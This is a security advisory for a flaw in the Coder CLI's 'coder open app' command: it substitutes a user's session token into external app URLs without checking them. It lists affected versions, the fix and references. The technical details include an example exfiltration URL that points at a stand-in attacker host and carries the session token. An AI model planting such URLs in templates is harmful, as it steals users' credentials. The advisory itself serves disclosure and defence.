Executive brief
Coder is a platform used by organizations to manage remote development environments. A security flaw in the Coder command-line tool could allow a malicious workspace template author to steal a user's session token. If a user opens a specially crafted application link within a compromised workspace, their login credentials could be sent to an attacker, potentially leading to unauthorized account access.
Technical details
A vulnerability exists in the Coder CLI's 'coder open app' command due to insufficient validation of external workspace-app URLs. The CLI automatically replaces the '$SESSION_TOKEN' placeholder with the user's actual session token before passing the URL to the operating system's default handler. Because the CLI fails to validate the URL scheme or host, a malicious template author can define an external app URL pointing to an attacker-controlled server (e.g., https://attacker.com/?t=$SESSION_TOKEN). If a victim executes the command against such a workspace, their session token is exfiltrated. The fix introduces a URL-scheme allowlist and restricts token substitution to trusted destinations.
Affected products
- Coder Coder < 2.29.17, >= 2.30.0 < 2.32.7, >= 2.33.0 < 2.33.8, >= 2.34.0 < 2.34.2
Timeline
- 2026-06-11: patched: Fix merged into main branch
- 2026-07-08: disclosed: CVE published
References
- https://github.com/coder/coder/pull/26146
- https://github.com/coder/coder/releases/tag/v2.29.17
- https://github.com/coder/coder/releases/tag/v2.32.7
- https://github.com/coder/coder/releases/tag/v2.33.8
- https://github.com/coder/coder/releases/tag/v2.34.2
- https://github.com/coder/coder/security/advisories/GHSA-v54h-cp2w-9x4g